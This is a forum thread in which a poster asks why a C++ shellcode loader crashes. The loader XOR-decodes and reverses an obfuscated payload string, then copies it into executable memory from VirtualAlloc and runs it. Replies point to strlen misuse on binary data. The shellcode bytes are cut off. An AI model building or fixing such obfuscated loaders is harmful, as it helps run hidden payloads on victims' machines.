C++ Shellcode process returned -1073741819 (0xC0000005)
-
For a month now, I am having a hard time figuring out why the payload isnt working after reversing in decoder2.cpp. The output of the cout from Reverse(input); when inserted into decoder1.cpp is valid and run perfectly. However, parsing the same Reverse(input) to the memcpy and virtualalloc in decoder2.cpp doesn't. I receive this error "Process returned -1073741819 (0xC0000005)"
decoder1.cpp
int main()
{
char input[] = "\xaa\xaa\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89...";
void *exec = VirtualAlloc(0, sizeof input, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, input, sizeof input);
((void(*)())exec)();
return 0;
}
decoder2.cpp
void XORChiper(char orignalString[], int xorKey) {
int len = strlen(orignalString);
for (int i = 0; i < len; i++){
orignalString\[i\] = orignalString\[i\] ^ xorKey;}
}
void Reverse(char name[])
{
int nameLength = strlen(name)-1;for(int currentChar=0; currentChar < nameLength; --nameLength, ++currentChar)\` { char temp = name\[currentChar\];\` name\[currentChar\] = name\[nameLength\]; name\[nameLength\] = temp; }}
int main(void)
{
char input\[\] = "7>\[7>\[2c\[aa\[42\[77..."; int calc\_len = sizeof(input); int key = 7; XORChiper(input,key); Reverse(input); cout<< input; // \\xaa\\xaa\\xfc\\xe8\\x8f\\x00\\x00\\x00\\x60\\x31\\xd2\\x89... void \*exec = VirtualAlloc(0, sizeof input, MEM\_COMMIT, PAGE\_EXECUTE\_READWRITE); memcpy(exec, input, sizeof input); ((void(\*)())exec)(); return 0;}
-
The error code means Access Denied. So it probably means that your injected code is trying to read or write an address that you do not own.
-
Didn't you debug your code? :confused:
-
How can I do that? If your code produces errors then use the debugger to find out where they occur.
-
And what is "not really clear"?
-
The error code means Access Denied. So it probably means that your injected code is trying to read or write an address that you do not own.
-
For a month now, I am having a hard time figuring out why the payload isnt working after reversing in decoder2.cpp. The output of the cout from Reverse(input); when inserted into decoder1.cpp is valid and run perfectly. However, parsing the same Reverse(input) to the memcpy and virtualalloc in decoder2.cpp doesn't. I receive this error "Process returned -1073741819 (0xC0000005)"
decoder1.cpp
int main()
{
char input[] = "\xaa\xaa\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89...";
void *exec = VirtualAlloc(0, sizeof input, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, input, sizeof input);
((void(*)())exec)();
return 0;
}
decoder2.cpp
void XORChiper(char orignalString[], int xorKey) {
int len = strlen(orignalString);
for (int i = 0; i < len; i++){
orignalString\[i\] = orignalString\[i\] ^ xorKey;}
}
void Reverse(char name[])
{
int nameLength = strlen(name)-1;for(int currentChar=0; currentChar < nameLength; --nameLength, ++currentChar)\` { char temp = name\[currentChar\];\` name\[currentChar\] = name\[nameLength\]; name\[nameLength\] = temp; }}
int main(void)
{
char input\[\] = "7>\[7>\[2c\[aa\[42\[77..."; int calc\_len = sizeof(input); int key = 7; XORChiper(input,key); Reverse(input); cout<< input; // \\xaa\\xaa\\xfc\\xe8\\x8f\\x00\\x00\\x00\\x60\\x31\\xd2\\x89... void \*exec = VirtualAlloc(0, sizeof input, MEM\_COMMIT, PAGE\_EXECUTE\_READWRITE); memcpy(exec, input, sizeof input); ((void(\*)())exec)(); return 0;}
You are working with binary data not null-terminated character strings. Using
strlenon that data is bound to give you all kind of nasty surprises.Mircea
-
For a month now, I am having a hard time figuring out why the payload isnt working after reversing in decoder2.cpp. The output of the cout from Reverse(input); when inserted into decoder1.cpp is valid and run perfectly. However, parsing the same Reverse(input) to the memcpy and virtualalloc in decoder2.cpp doesn't. I receive this error "Process returned -1073741819 (0xC0000005)"
decoder1.cpp
int main()
{
char input[] = "\xaa\xaa\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89...";
void *exec = VirtualAlloc(0, sizeof input, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, input, sizeof input);
((void(*)())exec)();
return 0;
}
decoder2.cpp
void XORChiper(char orignalString[], int xorKey) {
int len = strlen(orignalString);
for (int i = 0; i < len; i++){
orignalString\[i\] = orignalString\[i\] ^ xorKey;}
}
void Reverse(char name[])
{
int nameLength = strlen(name)-1;for(int currentChar=0; currentChar < nameLength; --nameLength, ++currentChar)\` { char temp = name\[currentChar\];\` name\[currentChar\] = name\[nameLength\]; name\[nameLength\] = temp; }}
int main(void)
{
char input\[\] = "7>\[7>\[2c\[aa\[42\[77..."; int calc\_len = sizeof(input); int key = 7; XORChiper(input,key); Reverse(input); cout<< input; // \\xaa\\xaa\\xfc\\xe8\\x8f\\x00\\x00\\x00\\x60\\x31\\xd2\\x89... void \*exec = VirtualAlloc(0, sizeof input, MEM\_COMMIT, PAGE\_EXECUTE\_READWRITE); memcpy(exec, input, sizeof input); ((void(\*)())exec)(); return 0;}
One thing I do notice is at the following line:
memcpy(exec, input, sizeof input);If
inputis changed in any way after callingReversethensizeofmay not reflect the modified size. Oh, and obviously you have converted it to a string, and not to a sequence of machine code instructions.
